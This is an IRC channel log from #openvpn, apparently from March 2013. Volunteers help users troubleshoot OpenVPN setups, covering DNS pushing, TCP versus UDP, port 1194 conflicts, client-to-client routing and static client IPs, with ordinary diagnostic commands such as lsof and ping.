<@ecrist> like your comment about script-security above 13:37 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has quit [Quit: nand] 13:37 < sanfran> we'll i changed the config to reflect the certs location in /etc/openvpn, seemed like it would work, but now there are new errors. shall i pastebin that log? 13:38 <@ecrist> yes 13:38 -!- levifig [~levifig@spwn.co] has quit [Excess Flood] 13:39 -!- levifig [~levifig@spwn.co] has joined #openvpn 13:39 -!- Porkepix [~Porkepix@157.138.190.113] has quit [Ping timeout: 248 seconds] 13:39 < sanfran> http://pastebin.com/gJjThXT8 13:40 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has joined #openvpn 13:41 <@ecrist> are you running this as root? 13:41 -!- zz_AsadH is now known as AsadH 13:41 < sanfran> no. 13:41 <@ecrist> you need to 13:42 < sanfran> XD 13:42 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has joined #openvpn 13:46 -!- sanfran [~sanfran@209-6-38-16.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com] has quit [Ping timeout: 248 seconds] 13:46 <@ecrist> his VPN must have fired up 13:49 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has quit [Quit: Computer has gone to sleep.] 13:50 -!- sanfran [~sanfran@209-6-38-16.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com] has joined #openvpn 13:50 < sanfran> did ya'll get any of that? 13:50 < sanfran> it seemed to work, at least, it didn't complain. but i couldn't access the internet. 13:51 <@ecrist> log? 13:51 * sanfran facepalm 13:51 < sanfran> look, i'm missing something simple. perhaps the order of connecting? 13:53 < sanfran> http://pastebin.com/qmyufz7Z 13:53 -!- sanfran_ [~sanfran@209-6-38-16.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com] has joined #openvpn 13:53 < pekster> How did you test Internet access? If you didn't try a ping by IP you might be loosing DNS requests as some ISPs only accept requests from inside clients 13:53 < pekster> Also, that log is not a 'verb 4' and will be of somewhat limited use 13:54 < sanfran> yea, i just tried to go to google.com 13:54 <@ecrist> try pinging 8.8.8.8 or something 13:54 < sanfran> apparently i'm here now too. 13:54 <@ecrist> 13:46:29 -!- sanfran [~sanfran@209-6-38-16.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com] has quit [Ping timeout: 248 seconds] 13:54 <@ecrist> 13:46:41 <@ecrist> his VPN must have fired up 13:55 < sanfran> so, do everything again? 13:55 < sanfran> am i just not being pateint enough? 13:56 < pekster> See my DNS comment above. Provide logs at 'verb 4' if you want more useful information, since it's likely everything is working "just fine" on the VPN, although without knowing things like keepalive status it's hard to even say that 13:57 < sanfran> here goes. 13:58 -!- sanfran__ [~sanfran@216.155.131.76] has joined #openvpn 13:59 < sanfran__> how ya like meh now? 13:59 <@ecrist> ah, looks like you got it running 13:59 < sanfran__> pinging 8.8.8.8 returns fine. 13:59 < sanfran__> how can *you* tell? 14:00 < sanfran__> or are you just guessing by the obscure host? 14:00 < pekster> s/obscure/different/ 14:00 <@ecrist> you used to connect from 209.6.38.16 and now you're coming from 216.155.131.76 14:00 < sanfran__> yay 14:00 < sanfran__> but... how to browse the web? 14:00 -!- sanfran_ [~sanfran@209-6-38-16.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com] has quit [Read error: Operation timed out] 14:00 -!- sanfran_ [~sanfran@216.155.131.76] has joined #openvpn 14:00 < pekster> Fix your DNS? 14:01 < sanfran__> o, let me kill that. so, i think i'm getting it: i can do things in the tunnel and outside the tunnel? 14:01 < pekster> Not having seen your logs, I have no clue if your peer is pushing DNS options, bug: 14:01 < pekster> !pushdns 14:01 <@vpnHelper> "pushdns" is (#1) push "dhcp-option DNS a.b.c.d" to push dns to the client or (#2) http://thread.gmane.org/gmane.network.openvpn.user/25139/focus=25147 see that mail archive for some info on pushing dns or (#3) http://article.gmane.org/gmane.network.openvpn.user/25149 for a perm fix via regedit or (#4) in unix you'll use the update-resolv-conf script or (#5) also 14:01 <@vpnHelper> http://comments.gmane.org/gmane.network.openvpn.user/31975 reports --register-dns as fixing their problems pushing DNS to windows 7 14:01 < pekster> but* (not bug) 14:01 -!- sanfran [~sanfran@209-6-38-16.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com] has quit [Read error: Operation timed out] 14:01 -!- sanfran_ [~sanfran@216.155.131.76] has quit [Client Quit] 14:01 -!- sanfran [~sanfran@216.155.131.76] has joined #openvpn 14:01 -!- sanfran [~sanfran@216.155.131.76] has quit [Client Quit] 14:02 < pekster> #4 on that output applies to Linux/Unix systems 14:04 < sanfran__> so, connections that were initiated before the tunnel are outside the tunnel? meaning i could appear to be looking at only cats, but really be looking at cats and dogs? 14:04 -!- sanfran__ is now known as sanfran 14:06 < pekster> No, routing is done per-packet, not per connection 14:06 <@ecrist> connections outside the tunnel will die 14:07 < sanfran> thanks that makes perfect sense. 14:08 < sanfran> i'm still not convinced that my web browser is working right. it seems to know i'm in Boston. 14:08 <@ecrist> go here: http://www.secure-computing.net/ip.php 14:08 <@vpnHelper> Title: SCN: SCN (at www.secure-computing.net) 14:08 <@ecrist> both with teh VPN connected and with it disconnected 14:09 -!- Mimiko [~Mimiko@89.28.88.177] has joined #openvpn 14:09 -!- Porkepix [~Porkepix@157.138.190.113] has joined #openvpn 14:09 <@ecrist> also, keep in mind location data may be saved in a cookie in your browser, and not based on your IP 14:12 -!- sanfran [~sanfran@216.155.131.76] has quit [Read error: Operation timed out] 14:13 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 14:13 -!- TMcTrain [~kvirc@p54BBB9D2.dip.t-dialin.net] has joined #openvpn 14:14 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has quit [Read error: Operation timed out] 14:15 -!- sanfran [~sanfran@209-6-38-16.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com] has joined #openvpn 14:15 < sanfran> the ip does change. but google can still answer "where am i?" with my actual location. what gives? 14:15 <@ecrist> also, keep in mind location data may be saved in a cookie in your browser, and not based on your IP 14:16 < sanfran> yea, snitching. where is that little ba^&*d? 14:16 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 14:17 < pekster> Google's probably smart enough to use a one-time-use subdomain DNS request to aat least return the general area where your DNS server is located too 14:17 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 14:17 < pekster> You can use a public DNS such as 8.8.8.8 for google's open resolvers 14:18 < pekster> I suspect that's more likely than google using an old cookie to list where you "used" to appear from when you ask it to find your location now 14:18 -!- Devastator [~devas@186.214.110.30] has joined #openvpn 14:19 < sanfran> pekster: it's just smart enough to know that i didn't move to Sweden, or wherever, in less than a minute? 14:20 < pekster> WolframAlpha shows me as connecting from VA, US across my SOCKS proxy at AWS across my VPN hosted on my cloud system 14:20 < pekster> I think it's just keying off the IP, although I do redirect my DNS requests through the proxy in that setup 14:21 < sanfran> 0.o 14:21 < pekster> Google gets more confused, apparently 14:22 < pekster> Despite the IP coming from VA, US (for the US East AWS host) it answers the question "Where am I" with LA, CA, US 14:22 < pekster> heh 14:22 < pekster> I'm going to award the better answer in that case to WolframAlpha 14:24 < sanfran> that is weird? 14:24 < sanfran> nix that question mark 14:26 < pekster> For more fun on how easy your browser is to uniquely fingerprint, check out https://panopticlick.eff.org 14:26 <@vpnHelper> Title: Panopticlick (at panopticlick.eff.org) 14:30 -!- Mimiko [~Mimiko@89.28.88.177] has quit [] 14:31 < sanfran> Thanks ya'll. just one more question: am i using SSH here, and if not, where can i read more about doing so? 14:31 < pekster> I don't understand the context for your question. SSH is its own protocol, just like IRC or OpenVPN 14:32 -!- dazo is now known as dazo_afk 14:32 < sanfran> okay, which port am i tunneling through? does that make sense? 14:33 * sanfran needs education 14:33 < pekster> OpenVPN uses port 1194 by convention (and the config file you pasted earlier does indeed use that.) UDP is the default, although OpenVPN can also operate over TCP. It can use any port you want 14:34 < pekster> See the --port and --proto options in the manpage for more info 14:36 < sanfran> cool. i need to change that then, as i often connect at cafes 14:36 < pekster> That should work fine from a wifi cafe 14:36 < pekster> Why would you need to change it? 14:38 < sanfran> I thought most places would only allow 80. 14:39 < sanfran> Like, there's one place that has OpenDNS set up with a parental control. 14:39 < pekster> That doesn't mean they do port-based filtering. Most "public" wifi hotspots allow almost anything outbound. Some restrict ports like 25 due to mail spam, but otherwise they're pretty open 14:40 < pekster> If you don't control the server, you can't just "change" the port 14:40 < sanfran> The VPN server, you mean? 14:40 < pekster> Right 14:41 < sanfran> okay 14:41 * sanfran changes it back 14:41 < pekster> You don't want tcp anyway unless you need it: 14:41 < pekster> !tcp 14:42 <@vpnHelper> "tcp" is (#1) Sometimes you cannot avoid tunneling over tcp, but if you can avoid it, DO. http://sites.inka.de/~bigred/devel/tcp-tcp.html Why TCP Over TCP Is A Bad Idea. or (#2) http://www.openvpn.net/papers/BLUG-talk/14.html for a presentation by James Yonan (OpenVPN lead developer) or (#3) if you must use tcp, you likely want --tcp-nodelay 14:43 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has joined #openvpn 14:46 -!- sanfran_ [~sanfran@108-61-59-19ch.openskytelcom.net] has joined #openvpn 14:48 < sanfran_> lol "Sayreville" 14:48 -!- sanfran [~sanfran@209-6-38-16.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com] has quit [Ping timeout: 245 seconds] 14:59 -!- JSharpe [~JSharpe@46.165.221.13] has quit [Quit: Leaving] 15:11 -!- JacquesBH [~jacques@unaffiliated/jacquesbh] has quit [Remote host closed the connection] 15:17 -!- Orbi [~opera@anon-184-33.vpn.ipredator.se] has joined #openvpn 15:26 -!- sanfran_ is now known as sanfran 15:35 -!- wykydtro- is now known as wykydtron 15:41 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0/20130215130331]] 16:12 -!- Orbi [~opera@anon-184-33.vpn.ipredator.se] has quit [Ping timeout: 245 seconds] 16:12 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Quit: Leaving] 16:18 -!- zhvtar is now known as abowman 16:21 -!- emmanuelux [~emmanuelu@94.23.150.162] has joined #openvpn 16:36 -!- no0 [~n00@82.211.217.207] has joined #openvpn 16:41 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Excess Flood] 16:46 -!- Porkepix [~Porkepix@157.138.190.113] has quit [Quit: Computer has gone to sleep.] 16:49 -!- abowman is now known as zhvtar 16:51 < no0> Hey pekster, you there ? :) 16:54 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 16:55 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 17:01 -!- emmanuelux [~emmanuelu@94.23.150.162] has quit [Ping timeout: 260 seconds] 17:11 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has joined #openvpn 17:15 -!- lmm [uid6417@gateway/web/irccloud.com/x-hunjxwmdptpgcgmf] has joined #openvpn 17:16 < lmm> hi, I have two clients connecting to a server. Both clients can ping the server, and the server can ping both clients, but the clients can't ping each other. What's the simplest way to make it so all clients see each other as being on the same network? 17:18 < no0> lmm: add the client-to-client setting? 17:18 < lmm> right, just "client-to-client" ? 17:18 < lmm> the howto only seems to cover the more complex case 17:19 -!- emmanuelux [~emmanuelu@94.23.150.162] has joined #openvpn 17:20 < no0> i am quite new to the whole OpenVPN-thing, but try it :) 17:20 < lmm> am doing 17:24 -!- sanfran [~sanfran@108-61-59-19ch.openskytelcom.net] has quit [Ping timeout: 252 seconds] 17:24 < no0> !goal 17:24 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 17:25 < lmm> that looks good, the clients can ping each other 17:25 < no0> !help 17:25 <@vpnHelper> (help [] []) -- This command gives a useful description of what does. is only necessary if the command is in more than one plugin. 17:25 < no0> !welcome 17:25 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum !wiki 17:25 <@vpnHelper> !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 17:26 < no0> !topology 17:26 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this. 17:26 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 276 seconds] 17:35 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:38 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 17:50 -!- kothog [~kothog@unaffiliated/kothog] has left #openvpn ["force"] 18:09 -!- AsadH is now known as zz_AsadH 18:14 < no0> !wiki 18:14 <@vpnHelper> "wiki" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN for the Unofficial wiki or (#2) https://community.openvpn.net/openvpn/wiki for the Official wiki 18:26 -!- zhvtar is now known as aaron 18:27 -!- aaron is now known as Guest15815 18:28 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 18:30 -!- Guest15815 [~zhvtar@unaffiliated/zhvtar] has left #openvpn [] 18:32 < no0> Hi huys, anyone here have time for answering some bridge related questions? 18:34 < no0> *guys 18:37 -!- fluter [~fluter@fedora/fluter] has quit [Remote host closed the connection] 18:41 -!- no0 [~n00@82.211.217.207] has quit [] 18:43 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has joined #openvpn 18:45 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Ping timeout: 248 seconds] 18:51 -!- md_5 [~md_5@mcdevs/trusted/md-5] has joined #openvpn 18:55 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 276 seconds] 18:55 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 18:58 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 19:06 -!- kantlivelong [~kantlivel@47.23.189.90] has quit [Ping timeout: 245 seconds] 19:15 < lmm> don't ask to ask, just ask 19:17 -!- raidz is now known as raidz_away 19:20 <@ecrist> !ask 19:20 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc 19:21 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 19:44 -!- emmanuelux [~emmanuelu@94.23.150.162] has quit [Ping timeout: 276 seconds] 20:30 -!- Sidewinder [~de@unaffiliated/sidewinder] has quit [Quit: Leaving] 20:39 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 20:47 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 20:53 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has quit [Ping timeout: 245 seconds] 20:55 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has joined #openvpn 21:08 -!- Devastator- [~devas@186.214.110.30] has joined #openvpn 21:08 -!- Devastator [~devas@186.214.110.30] has quit [Read error: Connection reset by peer] 21:27 -!- matsh [divine@nanogene.org] has quit [Read error: Connection reset by peer] 21:27 -!- matsh [divine@nanogene.org] has joined #openvpn 21:42 < pekster> lmm: see below: 21:42 < pekster> !c2c 21:42 <@vpnHelper> "c2c" is "client-to-client" is with this option packets from 1 client to another are routed inside the server process. without it packets leave the server process, hit the kernel (firewall, routing table) and if allowed by firewall and routed back to server process, they go to the client. you use this option when you do not want to use selective firewall rules on what clients can access things 21:42 <@vpnHelper> behind other clients 21:49 < uberushaximus> !cqc 21:51 <@ecrist> !factoids 21:51 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php 22:13 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has quit [Ping timeout: 248 seconds] 22:15 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has joined #openvpn 22:31 -!- p3rror [~mezgani@41.140.30.221] has joined #openvpn 22:38 -!- p3rror [~mezgani@41.140.30.221] has left #openvpn ["Leaving"] 22:45 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Ping timeout: 245 seconds] 22:52 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 22:57 -!- maurer [maurer@terpsichore.ugcs.caltech.edu] has joined #openvpn 22:58 < maurer> Hey, I've got openvpn working, but I'd like to be able to get a client to have a set of ips (in this case forwarding an entire subnet) 22:58 < maurer> Is there a reasonable way to do this? 22:59 < pekster> maurer: you want to route a LAN to the client 22:59 < maurer> I mean, what I need is for the client machine to have x.y.z.1-254 23:00 < maurer> If routing a lan is the way to do that, then sure 23:00 < pekster> You can't do that with tun (since it's effectively a point-to-point interface.) In theory you could do that with tap 23:00 < pekster> Why on earth do you want that? 23:01 < maurer> Really dumb reasons. 23:01 < pekster> Then why do it? It's a very silly thing to want to do 23:03 < maurer> Is there any way to from the client config request a specific IP then? 23:05 < pekster> request one? No. You can have the client set one via the --ifconfig command. Or the server can push a static ip via --ifconfig-push. Note that in both of those cases you should avoid using an IP inside the --ifconfig-pool range (that directive is implied when you use --server or --server-bridge) 23:16 -!- pwrcycle [~pwrcycle@unaffiliated/pwrcycle] has quit [Ping timeout: 252 seconds] 23:22 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn --- Day changed Sat Mar 09 2013 00:23 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 00:25 -!- Wulf4 [~Wulf@unaffiliated/wulf] has joined #openvpn 00:29 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 252 seconds] 00:50 -!- Orbi [~opera@anon-148-191.vpn.ipredator.se] has joined #openvpn 00:50 -!- Orbi [~opera@anon-148-191.vpn.ipredator.se] has left #openvpn [] 01:16 -!- Wulf4 is now known as Wulf 01:26 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 01:42 -!- Orbi [~opera@anon-148-191.vpn.ipredator.se] has joined #openvpn 02:19 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 245 seconds] 02:21 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 02:24 -!- pa [~pa@unaffiliated/pa] has quit [Max SendQ exceeded] 02:24 -!- Varazir [~mircwars@c-94-255-130-47.cust.bredband2.com] has quit [Ping timeout: 276 seconds] 02:26 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 02:38 -!- maurer [maurer@terpsichore.ugcs.caltech.edu] has left #openvpn [] 03:01 -!- Varazir [~mircwars@c-94-255-130-176.cust.bredband2.com] has joined #openvpn 03:02 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 260 seconds] 03:20 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 03:23 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 03:28 -!- pa [~pa@unaffiliated/pa] has quit [Max SendQ exceeded] 03:30 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 03:32 -!- pa [~pa@unaffiliated/pa] has quit [Max SendQ exceeded] 03:34 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has quit [Ping timeout: 248 seconds] 03:41 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has joined #openvpn 03:50 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 04:00 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 04:08 -!- JSharpe [~JSharpe@46.165.208.207] has joined #openvpn 04:46 < jzaw> pls may i have some feedback / advice if i have a routed home lan (all non rfc1918 ips ie 81.2.122.x/26) 04:46 < jzaw> do i have to have a separate subnet for the openvpn server ? or can i use some of that /26 04:47 < jzaw> to be aware its almost entirely utilised except for some 10 consecutive ips 04:47 < jzaw> and being remote to it i cant split it cos machines would fall off t'tubes 05:32 -!- dxtr [4574b2ad@unaffiliated/dxtr] has quit [Ping timeout: 256 seconds] 05:33 <@krzee> must use separate for --server 05:33 <@krzee> can use bi-directional NAT 05:44 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 06:05 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in] 06:08 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 06:33 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 06:35 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 255 seconds] 06:35 -!- Denial- is now known as Denial 06:46 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 252 seconds] 06:53 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Quit: ZNC - http://znc.in] 06:54 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:59 < MacGyver> jzaw: If you use OpenVPN in bridging mode you can use the /26 as though those machines were on your home network, provided no more than 10 clients connect, afaik. 07:00 < MacGyver> jzaw: However, if you use it in routed mode then yes, you will need to use a separate subnet. You can also isolate part of the /26 to do that, I'd say, but I don't know if your setup would allow that. 07:01 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 07:01 < MacGyver> jzaw: "Being remote" doesn't sound like a really good reason not to be able to split, but that's me. 07:02 < Dennis84> hi all 07:03 < MacGyver> jzaw: And instead of splitting you can also go krzee's route, and use SNAT/DNAT on top of an RFC1918 subnet. 07:11 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Quit: leaving] 07:12 -!- dxtr [0005ac03@unaffiliated/dxtr] has joined #openvpn 07:13 -!- JackWinter1 [~jack@ppp-256.vo.lu] has joined #openvpn 07:15 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Ping timeout: 250 seconds] 07:33 < Dennis84> Wulf: are you available? 07:53 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has quit [Ping timeout: 264 seconds] 07:56 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has joined #openvpn 08:00 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has quit [Ping timeout: 240 seconds] 08:06 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has joined #openvpn 08:08 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 08:12 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has quit [Ping timeout: 260 seconds] 08:16 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has joined #openvpn 08:21 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has quit [Ping timeout: 260 seconds] 08:27 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has joined #openvpn 08:49 -!- JackWinter1 [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in] 08:50 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 08:52 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has quit [Ping timeout: 260 seconds] 09:01 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 09:45 -!- JackWinter [~jack@ppp-256.vo.lu] has left #openvpn ["Konversation terminated!"] 09:46 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 09:47 -!- JackWinter [~jack@ppp-256.vo.lu] has left #openvpn ["Konversation terminated!"] 09:48 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 09:52 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 248 seconds] 10:09 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:19 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 10:19 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 240 seconds] 10:27 < jzaw> MacGyver, ta for the info ... hard coded ips ... and risk of boxes not coming back up if i typo 10:27 < jzaw> im 2,000km away 10:28 < jzaw> my tap0 on the opvn router is up and getting the expected ip ... but i cant even ping the server ip on the vpn 10:28 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 10:28 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 245 seconds] 10:29 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:30 -!- Porkepix [~Porkepix@157.138.190.113] has joined #openvpn 10:30 -!- novaflash is now known as novaflash_away 10:33 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 276 seconds] 10:33 -!- novaflash_away is now known as novaflash 10:34 -!- Porkepix [~Porkepix@157.138.190.113] has quit [Ping timeout: 256 seconds] 10:40 -!- novaflash is now known as novaflash_away 10:40 -!- novaflash_away is now known as novaflash 10:48 -!- Porkepix [~Porkepix@157.138.190.113] has joined #openvpn 10:53 -!- Porkepix [~Porkepix@157.138.190.113] has quit [Ping timeout: 248 seconds] 10:56 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Excess Flood] 10:58 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 11:01 -!- Porkepix [~Porkepix@157.138.190.113] has joined #openvpn 11:05 -!- Porkepix [~Porkepix@157.138.190.113] has left #openvpn [] 11:19 -!- Orbi [~opera@anon-148-191.vpn.ipredator.se] has left #openvpn [] 11:20 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 11:43 -!- syn4pse [~syn@p5DDC0186.dip0.t-ipconnect.de] has joined #openvpn 11:44 -!- savr [~linux@unaffiliated/rvas] has joined #openvpn 11:45 < savr> openvpn was working a few days ago 11:45 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Read error: Connection reset by peer] 11:45 < savr> don't know what made it stop 11:45 <@ecrist> !logs 11:45 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 11:45 < savr> but now in the logs it is failing to assign port 1194 11:45 <@ecrist> generally, if it was working before, and it's not now, someone changed something 11:46 <@ecrist> savr: is another instance of openvpn listening on 1194, or another process? 11:46 < savr> Sat Mar 9 11:59:02 2013 UDPv4 link local (bound): [undef] 11:46 < savr> Sat Mar 9 11:59:02 2013 UDPv4 link remote: [undef] 11:46 < savr> nothing is according to nmap 11:46 < syn4pse> lsof -i :1194 11:46 <@ecrist> lsof -i TCP -i UDP | grep 1194 11:47 < savr> lsof: no pwd entry for UID 109 11:47 <@ecrist> heh, your server has issues 11:47 <@ecrist> your user doesn't exist, apparently 11:47 < savr> openvpn 18194 root 5u IPv4 224868 0t0 UDP *:openvpn 11:47 < savr> LOL 11:47 < savr> I'm root 11:47 <@ecrist> and that indicates openvpn is already looking at port 1194 11:47 < savr> how can I not exist 11:48 < syn4pse> only you know what u did to that box ;) 11:48 < savr> I did nothing!! 11:48 < syn4pse> nano ~/.bash_history ;) 11:48 < savr> other than access it from china 11:49 < syn4pse> chinese goverment destroyed your box :p 11:49 < savr> it's possible they've hacked it 11:50 < savr> I got some strange hacking attempts from chinese IPs according to logwatch/fail2ban 11:50 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 11:50 < syn4pse> thats normal ^^ 11:51 <@ecrist> very normal 11:51 < syn4pse> i get those emial reports from lfd 24/7 ;) 11:52 < savr> actually!! I did do something 11:52 < savr> I added a new openvpn client 11:52 <@ecrist> :) 11:53 < syn4pse> savr, it might be usefull to check the log of your vpn client and see what that one says 11:55 < savr> add status /tmp/openvpn.log to the client config? 11:57 < savr> still... there is a port error on the server in the logs 11:57 < savr> one which isn't clear what it means to me 11:58 < pekster> If you're running >1 instance on any system, they need to listen/source from different ports. It generally makes sense to use 'nobind' from the client so it dynamically creates one 11:58 < savr> I'm not 11:58 < pekster> Otherwise, posting the log with errors would be useful 11:58 < savr> I just made a second client cert 11:59 < savr> pekster: I did at :46 11:59 < pekster> No, you pasted 2 lines of the log that are not actually errors 12:01 < syn4pse> was about to say the same ;) 12:01 < savr> http://pastebin.com/gEZ9su2s 12:02 < syn4pse> i don`t see errors there 12:02 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 12:03 < syn4pse> check ur logs on the client side 12:03 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 264 seconds] 12:04 < savr> doing so 12:04 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 12:05 < syn4pse> savr, can u connect to it at least 12:05 < syn4pse> ? 12:05 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 12:06 < savr> no 12:06 < syn4pse> okey then ur client log will show why 12:07 < savr> it's just hanging 12:07 -!- MeanderingCode_ 